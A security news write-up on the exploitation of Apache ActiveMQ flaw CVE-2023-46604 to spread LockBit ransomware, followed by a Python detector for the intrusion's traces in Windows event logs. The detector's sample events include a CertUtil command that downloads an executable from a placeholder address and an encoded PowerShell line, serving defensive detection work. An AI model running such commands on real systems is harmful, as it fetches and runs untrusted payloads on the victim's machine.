A significant security breach has occurred involving a vulnerability in Apache ActiveMQ, leading to a widespread deployment of LockBit ransomware on an enterprise network. This critical flaw, identified as CVE-2023-46604, permits remote code execution, which attackers exploited to gain access to an unprotected Windows server.
Exploitation of Apache ActiveMQ Vulnerability
The breach commenced in mid-February 2024, when malicious actors utilized the Apache ActiveMQ vulnerability to send a crafted OpenWire command to the publicly accessible server. This exploit prompted the server to load a remote Java Spring XML configuration file, instructing the compromised system to download a Metasploit stager via the Windows CertUtil tool. The stager then established a command-and-control connection to a server controlled by the attackers, rapidly escalating to SYSTEM-level privileges and extracting credentials from LSASS process memory.
Despite initial efforts to remove the attackers, the vulnerability remained unpatched, allowing them to return 18 days later. The attackers re-entered the network by exploiting the same vulnerability, only altering file names. A privileged service account, whose credentials were stolen during the first intrusion, facilitated their re-entry into the system.
Advanced Attack Techniques and Impact
Upon re-entry, attackers confirmed domain administrator access and used a disguised network scanning tool to identify active hosts. They deployed LockBit ransomware executables across servers and workstations via Remote Desktop Protocol (RDP) sessions. The ransomware was executed using specific commands on file servers, while simple execution was used on other machines. The attackers left ransom notes directing victims to the Session private messaging app, indicating a deviation from official LockBit channels.
The overall duration from initial breach to full encryption was 419 hours, or just over 19 days. Early detection of the intrusion was crucial, as the attackers would have required less than 90 minutes to initiate the ransomware execution upon re-entry.
Credential Theft and Defensive Measures
The initial breach involved accessing LSASS memory on several hosts, which was captured in Sysmon logs. This credential theft enabled lateral movement within the network and provided a pathway for the second intrusion. The attackers employed obfuscation techniques for PowerShell commands, using string concatenation and encoding to evade detection. On hosts with active Microsoft Defender, these activities were intercepted and blocked, though unprotected systems were compromised.
To maintain access, the attackers installed AnyDesk silently on the compromised host, configured for auto-start. A batch file manipulated firewall settings to open RDP connections, which were removed shortly after execution. System logs were cleared to conceal their presence, and Windows Defender was disabled on the Exchange server using a legitimate executable.
Security experts advise organizations to promptly patch Apache ActiveMQ to mitigate CVE-2023-46604. Additional recommendations include enforcing LSASS protection, monitoring for log clearing activities, restricting unauthorized remote tool installations, and resetting credentials post-intrusion to prevent further breaches.
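The LSASS access, CertUtil download, obfuscated PowerShell and log clearing described above all leave traces in Sysmon and Windows Security event logs. The following detection logic is an added example, not code from the original report or the incident responders: it runs over constructed sample records, and the access masks, the lsass reader allowlist and the PowerShell regexes are assumptions that a real deployment would tune.

```python
import re
from dataclasses import dataclass, field

# Sysmon event 10 GrantedAccess masks typical of lsass reads (0x1010 = VM_READ | QUERY_LIMITED_INFO).
LSASS_DUMP_MASKS = {0x1010, 0x1038, 0x1410, 0x1438, 0x1FFFFF}
# Assumed allowlist of system processes that legitimately open lsass (tune per estate).
LSASS_ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
ENCODED_PS = re.compile(r"\s-e(?:nc(?:odedcommand)?)?\s+[a-z0-9+/=]{20,}")  # -e / -enc / -EncodedCommand
CONCAT_PS = re.compile(r"'\s*\+\s*'")                                        # 'str'+'ing' splitting

@dataclass
class Event:
    channel: str    # "Sysmon" or "Security"
    event_id: int
    fields: dict = field(default_factory=dict)

def classify(ev):
    """Return the alert names one event triggers (empty list if nothing matched)."""
    f = {k.lower(): str(v).lower() for k, v in ev.fields.items()}
    alerts = []
    if ev.channel == "Sysmon" and ev.event_id == 10:  # ProcessAccess
        if (f.get("targetimage", "").endswith(r"\lsass.exe")
                and f.get("sourceimage") not in LSASS_ALLOWLIST
                and int(f.get("grantedaccess", "0"), 16) in LSASS_DUMP_MASKS):
            alerts.append("lsass_memory_access")
    elif ev.channel == "Sysmon" and ev.event_id == 1:  # ProcessCreate
        image, cmd = f.get("image", ""), f.get("commandline", "")
        if image.endswith(r"\certutil.exe") and "urlcache" in cmd and "http" in cmd:
            alerts.append("certutil_download")
        if image.endswith(r"\powershell.exe") and (ENCODED_PS.search(cmd) or CONCAT_PS.search(cmd)):
            alerts.append("obfuscated_powershell")
    elif ev.channel == "Security" and ev.event_id == 1102:  # audit log cleared
        alerts.append("audit_log_cleared")
    return alerts

def scan(events):
    """Count how many events raised each alert name."""
    hits = {}
    for ev in events:
        for name in classify(ev):
            hits[name] = hits.get(name, 0) + 1
    return hits

# Constructed sample records mirroring the intrusion steps (not real telemetry).
SAMPLE_EVENTS = [
    Event("Sysmon", 1, {"Image": r"C:\Windows\System32\certutil.exe",
                        "CommandLine": r"certutil -urlcache -split -f http://198.51.100.7/s.exe C:\Windows\Temp\s.exe"}),
    Event("Sysmon", 10, {"SourceImage": r"C:\Windows\Temp\s.exe", "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"}),
    Event("Sysmon", 10, {"SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"}),
    Event("Sysmon", 1, {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}),
    Event("Security", 1102, {"SubjectUserName": "svc_backup"}),
]
```

Running `scan(SAMPLE_EVENTS)` raises one alert for each of the four intrusion steps and none for the allowlisted csrss.exe access; a production version would add the hostname and timestamp so the LSASS hit on one host can be correlated with the later RDP logons elsewhere.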
